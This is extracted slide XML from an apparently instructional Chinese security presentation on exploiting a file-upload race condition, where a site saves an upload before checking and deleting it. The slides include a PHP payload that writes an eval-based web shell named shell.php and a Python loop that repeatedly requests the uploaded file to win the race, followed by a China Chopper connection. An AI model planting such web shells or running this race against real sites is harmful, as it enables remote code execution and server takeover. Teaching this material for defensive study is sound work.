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文本]" phldr="0" custT="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr vert="horz" wrap="square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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>器</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>获</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>取文件</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t/>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE9066D1-3403-4469-8E8C-0D40A82430F2}" cxnId="{2FF58B0C-C35D-4A4F-9CED-B1ED34E14CC8}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8EC5AF5E-9C9F-410A-A755-A3EA5186F948}" cxnId="{2FF58B0C-C35D-4A4F-9CED-B1ED34E14CC8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保存</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>上传</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>临时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1E934BFE-4D40-486C-8784-F698A10C4CF5}" cxnId="{7DCF7FAF-E3E7-491F-BC86-5A5C9A7D5A90}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC1AFF77-9232-4EEB-95CB-85CEAB3B1FC0}" cxnId="{7DCF7FAF-E3E7-491F-BC86-5A5C9A7D5A90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重命名</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>移动</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>临时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9DABF4F3-A9E6-40B1-A863-AC9409CC14BB}" cxnId="{D2AB2060-60A0-431B-87E1-0EA788BDB468}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{18EFF3C3-47F9-402B-A3F3-E9310EA281B4}" cxnId="{D2AB2060-60A0-431B-87E1-0EA788BDB468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FF58B0C-C35D-4A4F-9CED-B1ED34E14CC8}" srcId="{8EB1D179-D23D-41D4-AEEF-E4B9FEB06903}" destId="{3F25DA44-7F3E-4C17-A40B-7F663FDBEA65}" srcOrd="0" destOrd="0" parTransId="{EE9066D1-3403-4469-8E8C-0D40A82430F2}" sibTransId="{8EC5AF5E-9C9F-410A-A755-A3EA5186F948}"/>
    <dgm:cxn modelId="{7DCF7FAF-E3E7-491F-BC86-5A5C9A7D5A90}" srcId="{8EB1D179-D23D-41D4-AEEF-E4B9FEB06903}" destId="{2E2F4D3A-969C-4DB2-9FA9-5C4A40369351}" srcOrd="1" destOrd="0" parTransId="{1E934BFE-4D40-486C-8784-F698A10C4CF5}" sibTransId="{EC1AFF77-9232-4EEB-95CB-85CEAB3B1FC0}"/>
    <dgm:cxn modelId="{D2AB2060-60A0-431B-87E1-0EA788BDB468}" srcId="{8EB1D179-D23D-41D4-AEEF-E4B9FEB06903}" destId="{37B86CFA-59B5-46FA-8A6B-9FB187CE14DF}" srcOrd="2" destOrd="0" parTransId="{9DABF4F3-A9E6-40B1-A863-AC9409CC14BB}" sibTransId="{18EFF3C3-47F9-402B-A3F3-E9310EA281B4}"/>
    <dgm:cxn modelId="{E3E2AE12-BC5C-460F-A990-A98F00CAE4B3}" type="presOf" srcId="{8EB1D179-D23D-41D4-AEEF-E4B9FEB06903}" destId="{BF708676-7EFC-4C81-9D3A-3E677EAC1C7B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{698F4069-CACB-42E9-B680-87D85844B946}" type="presParOf" srcId="{BF708676-7EFC-4C81-9D3A-3E677EAC1C7B}" destId="{111DEAC9-5D4C-4A6A-A44E-082A26F60596}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DCA6E472-D649-42D5-ACA8-4E40EF7A53D6}" type="presOf" srcId="{3F25DA44-7F3E-4C17-A40B-7F663FDBEA65}" destId="{111DEAC9-5D4C-4A6A-A44E-082A26F60596}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E64B7550-8C41-482E-B1FE-4A298A306DDB}" type="presParOf" srcId="{BF708676-7EFC-4C81-9D3A-3E677EAC1C7B}" destId="{8A5CF0CE-3323-464D-9C63-05C1BDB053F5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DB63926C-7328-4E20-8B10-12260E405FE0}" type="presOf" srcId="{8EC5AF5E-9C9F-410A-A755-A3EA5186F948}" destId="{8A5CF0CE-3323-464D-9C63-05C1BDB053F5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{B61993EE-73EC-4588-97C4-2D1BC3CF0D75}" type="presParOf" srcId="{8A5CF0CE-3323-464D-9C63-05C1BDB053F5}" destId="{5FA465F6-7607-499F-BFB2-52F4E071FB67}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{C0D498B9-AE78-43C7-8B84-9FC3AD55AC98}" type="presOf" srcId="{8EC5AF5E-9C9F-410A-A755-A3EA5186F948}" destId="{5FA465F6-7607-499F-BFB2-52F4E071FB67}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D718E5F5-DB90-4EA6-BBE9-DB1A66420724}" type="presParOf" srcId="{BF708676-7EFC-4C81-9D3A-3E677EAC1C7B}" destId="{552FB8E7-A5FB-4CC3-94C3-CE0BDF19F9F1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{2F2B4E89-4908-4A96-BBFB-A1E59E99CD9E}" type="presOf" srcId="{2E2F4D3A-969C-4DB2-9FA9-5C4A40369351}" destId="{552FB8E7-A5FB-4CC3-94C3-CE0BDF19F9F1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A92E2360-B732-4A56-847C-F0B6A82F7FE5}" type="presParOf" srcId="{BF708676-7EFC-4C81-9D3A-3E677EAC1C7B}" destId="{353C3794-50AA-4D44-83C9-CE28317C3317}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{80CC645C-8E70-4C4C-B2C9-010A8691ED34}" type="presOf" srcId="{EC1AFF77-9232-4EEB-95CB-85CEAB3B1FC0}" destId="{353C3794-50AA-4D44-83C9-CE28317C3317}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{FC88D41D-C04C-4B20-B719-44E67C44B0B7}" type="presParOf" srcId="{353C3794-50AA-4D44-83C9-CE28317C3317}" destId="{5AFF040D-0639-4120-9E39-DA822CF9F321}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{60D554A3-0870-46E0-B5FC-75B74ADFBA76}" type="presOf" srcId="{EC1AFF77-9232-4EEB-95CB-85CEAB3B1FC0}" destId="{5AFF040D-0639-4120-9E39-DA822CF9F321}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{22BDD0FD-7983-433B-BF3F-11EB22230EB7}" type="presParOf" srcId="{BF708676-7EFC-4C81-9D3A-3E677EAC1C7B}" destId="{A1E15D63-E1FF-4A28-A04F-A2B65927BC31}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DE1CC7EC-42AF-4309-A0CF-57F6A1FEE243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2067543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服务器获取文件</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2067543"/>
        <a:ext cx="2138947" cy="1283368"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8A5CF0CE-3323-464D-9C63-05C1BDB053F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="4" name="右箭头 3"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2340008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40008" y="2443998"/>
        <a:ext cx="453457" cy="530459"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{552FB8E7-A5FB-4CC3-94C3-CE0BDF19F9F1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="6" name="圆角矩形 5"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2994526" y="2067543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保存上传临时文件</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2994526" y="2067543"/>
        <a:ext cx="2138947" cy="1283368"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{353C3794-50AA-4D44-83C9-CE28317C3317}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="7" name="右箭头 6"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="5334535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334535" y="2443998"/>
        <a:ext cx="453457" cy="530459"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A1E15D63-E1FF-4A28-A04F-A2B65927BC31}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="9" name="圆角矩形 8"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="5989053" y="2067543"/>
          <a:ext cx="2138947" cy="128336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重命名移动临时文件</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5989053" y="2067543"/>
        <a:ext cx="2138947" cy="1283368"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5FA465F6-7607-499F-BFB2-52F4E071FB67}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="5" name="右箭头 4"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2340008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40008" y="2443998"/>
        <a:ext cx="453457" cy="530459"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5AFF040D-0639-4120-9E39-DA822CF9F321}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="8" name="右箭头 7"/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="5334535" y="2443998"/>
          <a:ext cx="453457" cy="53045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334535" y="2443998"/>
        <a:ext cx="453457" cy="53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文件上传-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竞争条件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竞争条件文件上传利用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提前不断访问代码文件，然后上传，最终使用菜刀连接一句话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发送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import requests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while true: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requests.get(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”)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715" y="3665220"/>
            <a:ext cx="7541260" cy="3112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3976370" cy="1461770"/>
            <a:chOff x="4298950" y="2302193"/>
            <a:chExt cx="397637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961800" cy="521970"/>
              <a:chOff x="3702051" y="2108518"/>
              <a:chExt cx="396180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文件上传过程介绍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34544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竞争条件原理介绍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4749800" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="4749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竞争条件代码分析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竞争条件文件上传利用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913380"/>
            <a:ext cx="3976370" cy="1461770"/>
            <a:chOff x="4298950" y="2302193"/>
            <a:chExt cx="397637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961800" cy="521970"/>
              <a:chOff x="3702051" y="2108518"/>
              <a:chExt cx="3961800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09451" y="2108518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文件上传过程介绍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20920" y="3241993"/>
              <a:ext cx="34544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竞争条件原理介绍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4749800" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="47498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竞争条件代码分析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竞争条件文件上传利用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文件上传过程介绍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文件上传过程介绍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221105"/>
            <a:ext cx="10836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文件上传过程：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83305" y="3081655"/>
            <a:ext cx="50253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竞争条件原理介绍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竞争条件原理介绍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43319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网站逻辑：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、网站允许上传任意文件，然后检查上传文件是否包含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，如果包含删除该文件。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、网站允许上传任意文件，但是如果不是指定类型，那么使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>删除文件。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在删除之前访问上传的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文件，从而执行上传文件中的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407860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例如：上传文件代码如下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fputs(fopen('shell.php','w'),'&lt;?php @eval($_POST[“cmd”]) ?&gt;');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5735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竞争条件代码分析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竞争条件代码分析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先进行上传，后进行判断与删除。利用时间差进行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上传。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993265"/>
            <a:ext cx="9038590" cy="3998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竞争条件文件上传利用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WPS 演示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文件上传过程介绍</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>上传phpinfo探测文件</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>文件包含漏洞代码分析</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>结合文件包含输出phpinfo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172</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-05T23:26:30Z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